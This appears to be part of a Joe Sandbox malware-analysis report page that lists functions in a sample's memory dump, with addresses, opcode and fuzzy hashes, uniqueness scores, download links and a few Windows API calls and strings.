Associated: 00000000.00000002.2042148744.0000000000339000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042163854.000000000033E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042163854.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_230000_file.jbxd

Yara matches

Similarity

API ID: InfoLocale
String ID:
API String ID: 2299586839-0
Opcode ID: 03442bbb469f512ad81cb431389a9da9870d5fb76612a188c3b17f3e55b753f2
Instruction ID: 3e60faf298116c1854b2264a58f174203dbeff02b1a6dee0243dfa430dcded0d
Opcode Fuzzy Hash: 03442bbb469f512ad81cb431389a9da9870d5fb76612a188c3b17f3e55b753f2
Instruction Fuzzy Hash: 96E04F31910129BBCF166F61DC05FAE7F1AEF44750F004114FD0565161CB728D31AAD5

Uniqueness

Uniqueness Score: -1.00%

Function 002B2B60 Relevance: 1.5, Strings: 1, Instructions: 259COMMON

Download Yara Rule

Strings

E-<E, xrefs: 002B2B6B

Memory Dump Source

Source File: 00000000.00000002.2041978620.000000000023F000.00000020.00000001.01000000.00000003.sdmp, Offset: 00230000, based on PE: true

Associated: 00000000.00000002.2041959962.0000000000230000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041978620.0000000000231000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041978620.000000000023B000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041978620.00000000002E0000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042083661.00000000002E7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042103802.00000000002FB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042132039.000000000032F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042148744.0000000000339000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042163854.000000000033E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042163854.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_230000_file.jbxd

Yara matches

Similarity

API ID:
String ID: E-<E
API String ID: 0-3361631808
Opcode ID: b0388e9a7ab671ea1b3a5c0cc27f65413d4e08a4d90344daf04c1f352b1c73a1
Instruction ID: 45f4257a21f52c23a4abceebe8b7ed859495a56edac79c9d94945487f9a3bd60
Opcode Fuzzy Hash: b0388e9a7ab671ea1b3a5c0cc27f65413d4e08a4d90344daf04c1f352b1c73a1
Instruction Fuzzy Hash: 20A14171A10229DBCB24DF19C8807EDB7F9FF89344F2541EAD809AB245D771AE958F80

Uniqueness

Uniqueness Score: -1.00%

Function 002C230B Relevance: 1.3, Strings: 1, Instructions: 23COMMON

Download Yara Rule

Strings

GetSystemTimePreciseAsFileTime, xrefs: 002C2311, 002C231B

Memory Dump Source

Source File: 00000000.00000002.2041978620.000000000023F000.00000020.00000001.01000000.00000003.sdmp, Offset: 00230000, based on PE: true

Associated: 00000000.00000002.2041959962.0000000000230000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041978620.0000000000231000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041978620.000000000023B000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041978620.00000000002E0000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042083661.00000000002E7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042103802.00000000002FB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042132039.000000000032F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042148744.0000000000339000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042163854.000000000033E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042163854.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_230000_file.jbxd

Yara matches

Similarity

API ID:
String ID: GetSystemTimePreciseAsFileTime
API String ID: 0-595813830
Opcode ID: f3dab3539ffc45380f1f8d3842774ab11dd58ec637265b2c9ee758e6fdbf0a88
Instruction ID: 6b5116f75df0b22644a48fb1b00f229cf178d8438bce4da555afa1a2c44d9069
Opcode Fuzzy Hash: f3dab3539ffc45380f1f8d3842774ab11dd58ec637265b2c9ee758e6fdbf0a88
Instruction Fuzzy Hash: 58E0C2326D126867DA1127866C06E99BA08C761BB2F860072FA0C6A1D1D9B54CB086D5

Uniqueness

Uniqueness Score: -1.00%

Function 002B24F0 Relevance: .4, Instructions: 449COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2041978620.000000000023F000.00000020.00000001.01000000.00000003.sdmp, Offset: 00230000, based on PE: true

Associated: 00000000.00000002.2041959962.0000000000230000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041978620.0000000000231000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041978620.000000000023B000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041978620.00000000002E0000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042083661.00000000002E7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042103802.00000000002FB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042132039.000000000032F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042148744.0000000000339000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042163854.000000000033E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042163854.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_230000_file.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cca970a73247248ded8be12fe0ede624eff6902a29ea4c3c21ed041b84a28ed1
Instruction ID: 9ceb65dadbf05348184881fc191be8d81dfa32e4e6166a2015c6f428f90ceb2c
Opcode Fuzzy Hash: cca970a73247248ded8be12fe0ede624eff6902a29ea4c3c21ed041b84a28ed1
Instruction Fuzzy Hash: 41F11C71E1021ADBDF14CFA8C8806EDB7B5FF88354F258269E819AB380D730AD55CB94

Uniqueness

Uniqueness Score: -1.00%

Function 002BF82B Relevance: .3, Instructions: 337COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2041978620.000000000023F000.00000020.00000001.01000000.00000003.sdmp, Offset: 00230000, based on PE: true

Associated: 00000000.00000002.2041959962.0000000000230000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041978620.0000000000231000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041978620.000000000023B000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041978620.00000000002E0000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042083661.00000000002E7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042103802.00000000002FB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042132039.000000000032F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042148744.0000000000339000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042163854.000000000033E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042163854.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_230000_file.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1f39ea33b9431a94842873bba9eee840336b9e542d46f08539ecaea2a8652464
Instruction ID: 8fdc7fa3ace377286d68f89dba4ff74082952a15f8db9b01202786d7fd74ef4d
Opcode Fuzzy Hash: 1f39ea33b9431a94842873bba9eee840336b9e542d46f08539ecaea2a8652464
Instruction Fuzzy Hash: 19B18C729202469FDB15CF68CD91BFEBBE5EF19394F148179E844AB342D2349D21CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 002AFC60 Relevance: .2, Instructions: 158COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2041978620.000000000023F000.00000020.00000001.01000000.00000003.sdmp, Offset: 00230000, based on PE: true

Associated: 00000000.00000002.2041959962.0000000000230000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041978620.0000000000231000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041978620.000000000023B000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041978620.00000000002E0000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042083661.00000000002E7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042103802.00000000002FB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042132039.000000000032F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042148744.0000000000339000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042163854.000000000033E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042163854.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_230000_file.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 727c3e4e85d85fac6c71e101ba82464d6309661b83e8073e0303406ba58a297f
Instruction ID: fdf235126b34b54fc65348a988573ee1bd24c8672c31e894992874a397a148f4
Opcode Fuzzy Hash: 727c3e4e85d85fac6c71e101ba82464d6309661b83e8073e0303406ba58a297f
Instruction Fuzzy Hash: 1C518471E1021AAFDF55CF99C981AEEBBB6EF85310F198069E815AB241C7349E50CB50

Uniqueness

Uniqueness Score: -1.00%

Function 002CC3AB Relevance: .0, Instructions: 40COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2041978620.000000000023F000.00000020.00000001.01000000.00000003.sdmp, Offset: 00230000, based on PE: true

Associated: 00000000.00000002.2041959962.0000000000230000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041978620.0000000000231000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041978620.000000000023B000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041978620.00000000002E0000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042083661.00000000002E7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042103802.00000000002FB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042132039.000000000032F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042148744.0000000000339000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042163854.000000000033E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042163854.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_230000_file.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7cc8fe4a3e97a1f06597e5449ede0d3afc203a8eb02071f4fd07c3beab2b4716
Instruction ID: 301bf63be90a5e1cb61f46a2996207dcbcfd9f2050727ae7224fc88cb830c765
Opcode Fuzzy Hash: 7cc8fe4a3e97a1f06597e5449ede0d3afc203a8eb02071f4fd07c3beab2b4716
Instruction Fuzzy Hash: 36F096726702619BC7268E5CA549F5573A8E709B10F2586D9F109EB290C6B1DE10C7C0

Uniqueness

Uniqueness Score: -1.00%

Function 002CC160 Relevance: .0, Instructions: 38COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2041978620.000000000023F000.00000020.00000001.01000000.00000003.sdmp, Offset: 00230000, based on PE: true

Associated: 00000000.00000002.2041959962.0000000000230000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041978620.0000000000231000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041978620.000000000023B000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041978620.00000000002E0000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042083661.00000000002E7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042103802.00000000002FB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042132039.000000000032F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042148744.0000000000339000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042163854.000000000033E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042163854.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_230000_file.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 46daa526eadcf92fae076df30de352592f2595076cfdef0393580a74ed93ee7a
Instruction ID: 224ee7bd23307ed1b8358e981b4c03df6a633540a09f297f19300ec0e47bfa41
Opcode Fuzzy Hash: 46daa526eadcf92fae076df30de352592f2595076cfdef0393580a74ed93ee7a
Instruction Fuzzy Hash: 05F090722A4202EFD706CE6EC958F1473E8EB05744F384669E10DDB652C2B0DE50CA10

Uniqueness

Uniqueness Score: -1.00%

Function 002CC2C4 Relevance: .0, Instructions: 29COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2041978620.000000000023F000.00000020.00000001.01000000.00000003.sdmp, Offset: 00230000, based on PE: true

Associated: 00000000.00000002.2041959962.0000000000230000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041978620.0000000000231000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041978620.000000000023B000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041978620.00000000002E0000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042083661.00000000002E7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042103802.00000000002FB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042132039.000000000032F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042148744.0000000000339000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042163854.000000000033E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042163854.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_230000_file.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5b8e7822d6067f3dce4cd96deb2f751c0efd7fd34770f745db6517e71d503d25
Instruction ID: e5ad130ba37d5d1a2137e2ffcac846b25786b518d5c1d9e27ca7aeda651bef50
Opcode Fuzzy Hash: 5b8e7822d6067f3dce4cd96deb2f751c0efd7fd34770f745db6517e71d503d25
Instruction Fuzzy Hash: F3F03032A25224EBCB16CB8CD445F5973BCEB45B61F21419AE946EB251C7B0DE90CBC1

Uniqueness

Uniqueness Score: -1.00%

Function 002CC319 Relevance: .0, Instructions: 29COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2041978620.000000000023F000.00000020.00000001.01000000.00000003.sdmp, Offset: 00230000, based on PE: true

Associated: 00000000.00000002.2041959962.0000000000230000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041978620.0000000000231000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041978620.000000000023B000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041978620.00000000002E0000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042083661.00000000002E7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042103802.00000000002FB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042132039.000000000032F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042148744.0000000000339000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042163854.000000000033E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042163854.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_230000_file.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 21da82fe32984bac10df77827b10725166925ae61087a98c7bfd21796e71d54a
Instruction ID: e4d9ee4bc09a587466641f224467a9cf521acd3308ed86574c699e2a9904a98e
Opcode Fuzzy Hash: 21da82fe32984bac10df77827b10725166925ae61087a98c7bfd21796e71d54a
Instruction Fuzzy Hash: F3F01C72A212649BCB26CA4CA845B89B2ACEB49B50F22409AF505E7251C6B09D408BC1

Uniqueness

Uniqueness Score: -1.00%

Function 002FB418 Relevance: .0, Instructions: 29COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2042103802.00000000002FB000.00000004.00000001.01000000.00000003.sdmp, Offset: 00230000, based on PE: true

Associated: 00000000.00000002.2041959962.0000000000230000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041978620.0000000000231000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041978620.000000000023B000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041978620.000000000023F000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041978620.00000000002E0000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042083661.00000000002E7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042132039.000000000032F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042148744.0000000000339000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042163854.000000000033E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042163854.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_230000_file.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 75cf99f039a1e854ba8d590396a2eec3821c6c0c10bc203e0cfc231443454280
Instruction ID: 99e2ef522daf836b1bce5c768014d3f4db73f188b3255d3357107ea11911004c
Opcode Fuzzy Hash: 75cf99f039a1e854ba8d590396a2eec3821c6c0c10bc203e0cfc231443454280
Instruction Fuzzy Hash: 97F0FEB1C007199FCB54DFADD5415AEFBF4FB08220B10866ED46AE3640E631AA408B51

Uniqueness

Uniqueness Score: -1.00%

Function 002CC0BA Relevance: .0, Instructions: 26COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2041978620.000000000023F000.00000020.00000001.01000000.00000003.sdmp, Offset: 00230000, based on PE: true

Associated: 00000000.00000002.2041959962.0000000000230000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041978620.0000000000231000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041978620.000000000023B000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041978620.00000000002E0000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042083661.00000000002E7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042103802.00000000002FB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042132039.000000000032F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042148744.0000000000339000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042163854.000000000033E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042163854.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_230000_file.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 91855d6d169dc9903da1dbc09fe8cd924a57fc87568255998812c4d1d7ac2e85
Instruction ID: 29009bbc5293ffc36ead46093979c8aefe2de4ca2f52a2bd708fa362484fcfbd
Opcode Fuzzy Hash: 91855d6d169dc9903da1dbc09fe8cd924a57fc87568255998812c4d1d7ac2e85
Instruction Fuzzy Hash: 65E06575621384EFCB0ACF68C584F0AB3F8EB88354F2040A8E409D7251D334DE80CB00

Uniqueness

Uniqueness Score: -1.00%

Function 002CC10D Relevance: .0, Instructions: 26COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2041978620.000000000023F000.00000020.00000001.01000000.00000003.sdmp, Offset: 00230000, based on PE: true

Associated: 00000000.00000002.2041959962.0000000000230000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041978620.0000000000231000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041978620.000000000023B000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041978620.00000000002E0000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042083661.00000000002E7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042103802.00000000002FB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042132039.000000000032F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042148744.0000000000339000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042163854.000000000033E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042163854.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_230000_file.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5dd4c8895f26782f00943891255ab379f2ec42632a76cad0fd066d57d6e4d82e
Instruction ID: b0d71d5f2f53ec7426572ef0b3342c6cf8677992f7c120fccd83bb747e5ab55b
Opcode Fuzzy Hash: 5dd4c8895f26782f00943891255ab379f2ec42632a76cad0fd066d57d6e4d82e
Instruction Fuzzy Hash: 90E06535610344EFCB1ACF69C984F49B3F9EB88354F2580A8E409C7252E334DE80CB00

Uniqueness

Uniqueness Score: -1.00%

Function 002CC36E Relevance: .0, Instructions: 22COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2041978620.000000000023F000.00000020.00000001.01000000.00000003.sdmp, Offset: 00230000, based on PE: true

Associated: 00000000.00000002.2041959962.0000000000230000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041978620.0000000000231000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041978620.000000000023B000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041978620.00000000002E0000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042083661.00000000002E7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042103802.00000000002FB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042132039.000000000032F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042148744.0000000000339000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042163854.000000000033E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042163854.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_230000_file.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1ef5de53d1dcd47e1777c4bcec7f1b74e5239bd0d096eeec7cfbe53e56215951
Instruction ID: 6c0e23ad67cd5c4b0d9555218e6b37e3ac3ea07310026ffba9267e29d817a579
Opcode Fuzzy Hash: 1ef5de53d1dcd47e1777c4bcec7f1b74e5239bd0d096eeec7cfbe53e56215951
Instruction Fuzzy Hash: 6DE08C72921268EBCB18EB88D904E8AF3ECEB45B00F25419AF905E3100C270DF00CBD0

Uniqueness

Uniqueness Score: -1.00%

Function 002CC1D1 Relevance: .0, Instructions: 18COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2041978620.000000000023F000.00000020.00000001.01000000.00000003.sdmp, Offset: 00230000, based on PE: true

Associated: 00000000.00000002.2041959962.0000000000230000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041978620.0000000000231000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041978620.000000000023B000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041978620.00000000002E0000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042083661.00000000002E7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042103802.00000000002FB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042132039.000000000032F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042148744.0000000000339000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042163854.000000000033E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042163854.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_230000_file.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 20e3536c2b146959e34d16781da7ec8895192a2aa47052009026efda122578fd
Instruction ID: 8112ae0f2f15a2b145f318c0095a9e6018e81c9b1ed37d5f086a236106180ca7
Opcode Fuzzy Hash: 20e3536c2b146959e34d16781da7ec8895192a2aa47052009026efda122578fd
Instruction Fuzzy Hash: C9E0E275521248EFCB04DFA9C549F4AB7F8EB48754F2548A4E409D7251D274EF80DA00

Uniqueness

Uniqueness Score: -1.00%

Function 002B9C27 Relevance: .0, Instructions: 12COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2041978620.000000000023F000.00000020.00000001.01000000.00000003.sdmp, Offset: 00230000, based on PE: true

Associated: 00000000.00000002.2041959962.0000000000230000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041978620.0000000000231000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041978620.000000000023B000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041978620.00000000002E0000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042083661.00000000002E7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042103802.00000000002FB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042132039.000000000032F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042148744.0000000000339000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042163854.000000000033E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042163854.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_230000_file.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 250aa52375e80b2e1787ee053931cdc6c0d70d8ccb2282c6be68dd0b4b2beb68
Instruction ID: 466e2a4cab210489a4ab46434fa095318a923be91065393c16db839059d19a36
Opcode Fuzzy Hash: 250aa52375e80b2e1787ee053931cdc6c0d70d8ccb2282c6be68dd0b4b2beb68
Instruction Fuzzy Hash: A4C08CB422090057CE2D8D10C3B13E43798E3A67C2F88048DC6034BB46D51E9CD2DA00

Uniqueness

Uniqueness Score: -1.00%

Function 0027293B Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 225
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCPInfo.KERNEL32(?,?), ref: 002729C6
MultiByteToWideChar.KERNEL32(?,00000009,?,?,00000000,00000000), ref: 00272A52
MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00272ABD
MultiByteToWideChar.KERNEL32(?,00000009,?,?,00000000,00000000), ref: 00272AD9
MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00272B3C
CompareStringEx.KERNEL32(?,?,00000000,?,00000000,?,00000000,00000000,00000000), ref: 00272B59

Strings

E-<E, xrefs: 00272941

Memory Dump Source

Source File: 00000000.00000002.2041978620.000000000023F000.00000020.00000001.01000000.00000003.sdmp, Offset: 00230000, based on PE: true

Associated: 00000000.00000002.2041959962.0000000000230000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041978620.0000000000231000.00000020.00000001.01000000.00000003.sdmpDownload File
